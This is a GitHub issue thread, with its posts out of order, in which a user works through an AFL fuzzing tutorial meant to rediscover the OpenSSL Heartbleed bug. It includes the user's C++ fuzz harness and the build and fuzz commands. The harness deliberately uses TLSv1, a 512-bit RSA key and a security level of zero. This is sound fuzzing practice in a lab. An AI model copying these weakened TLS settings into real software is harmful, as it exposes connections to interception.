mykter
commented
6 years ago It took a minute or two when I ran it. Will see if I can reproduce.
Closed Mambaboy closed 6 years ago
mykter
commented
6 years ago It took a minute or two when I ran it. Will see if I can reproduce.
mykter
commented
6 years ago 
That's using afl-2.52 and clang-4.0. Similar to what I remember when I first created it.
I just tried again with your seed, and this time it found it in <1minute, 18 paths. So doesn't look like a fluke, and certainly not one that would survive 24hrs fuzzing.
Standard afl debugging required then:
~/local/afl-2.52b/afl-showmap -o map -m none ./handshake < in/1[+] Instrumented 17 locations (ASAN/MSAN mode, ratio 100%).(I noticed your steps didn't specify "./config.sh -d" - it's worth including the -d so you've got debug symbols when you do find a crash. Update: turns out that doesn't necessarily help, and you need to pass the log through asan_symbolize.)
Mambaboy
commented
6 years ago Thanks for your reply. I review the process and find there is a change in my code. When compiling the handshake.cc modified according to ANSWERS.md, it fails and outputs an error that
SSL routines:SSL_CTX_use_certificate:ee key too small:ssl/ssl_rsa.c:310So I add a more line code:
SSL_CTX_set_security_level(sctx, 0);Then it compiles successfully. After the modification, the experiment is done entirely according to the tutorial. However it still does not detect the crash. Is the added code wrong? Or it would impede the detection of heartbleed bug?
My handshake.cc is as follow:
// Copyright 2016 Google Inc. All Rights Reserved.
// Licensed under the Apache License, Version 2.0 (the "License");
#include <openssl/ssl.h>
#include <openssl/err.h>
#include <assert.h>
#include <stdint.h>
#include <stddef.h>
#include <unistd.h>
#ifndef CERT_PATH
# define CERT_PATH
#endif
SSL_CTX *Init() {
SSL_library_init();
SSL_load_error_strings();
ERR_load_BIO_strings();
OpenSSL_add_all_algorithms();
SSL_CTX *sctx;
assert (sctx = SSL_CTX_new(TLSv1_method()));
SSL_CTX_set_security_level(sctx, 0);
/* These two file were created with this command:
openssl req -x509 -newkey rsa:512 -keyout server.key \
-out server.pem -days 9999 -nodes -subj /CN=a/
*/
if (!SSL_CTX_use_certificate_file(sctx, "./server.pem", SSL_FILETYPE_PEM)){
ERR_print_errors_fp(stderr);
exit(1);
}
assert(SSL_CTX_use_certificate_file(sctx, "./server.pem",
SSL_FILETYPE_PEM));
assert(SSL_CTX_use_PrivateKey_file(sctx, "./server.key",
SSL_FILETYPE_PEM));
return sctx;
}
int main() {
static SSL_CTX *sctx = Init();
SSL *server = SSL_new(sctx);
BIO *sinbio = BIO_new(BIO_s_mem());
BIO *soutbio = BIO_new(BIO_s_mem());
SSL_set_bio(server, sinbio, soutbio);
SSL_set_accept_state(server);
/* TODO: To spoof one end of the handshake, we need to write data to sinbio
* here */
#ifdef __AFL_HAVE_MANUAL_CONTROL
__AFL_INIT();
#endif
uint8_t data[100] = {0};
size_t size = read(STDIN_FILENO, data, 100);
if (size == -1) {
printf("Failed to read from stdin\n");
return(-1);
}
BIO_write(sinbio, data, size);
SSL_do_handshake(server);
SSL_free(server);
return 0;
}
I didn't have to make a modification when I tested it earlier - are you definitely on the right version of OpenSSL? That would explain both the harness needing changes and heartbleed not being there.
mykter
commented
6 years ago I'm going to close this, let me know if you're still having issues.
Hi, I have done the experiment as the tutorial, but only about 78 paths detected after 24 hours fuzzing, neither does the heartbleed vulnerability. The process is as follow:
AFL_USE_ASAN=1 /afl/afl-clang-fast++ -g handshake.cc openssl/libssl.a openssl/libcrypto.a -o handshake -I openssl/include -ldl
/afl/afl-fuzz -i /seed -o /out -m none -- //handshake
Regards, xiaosatianyu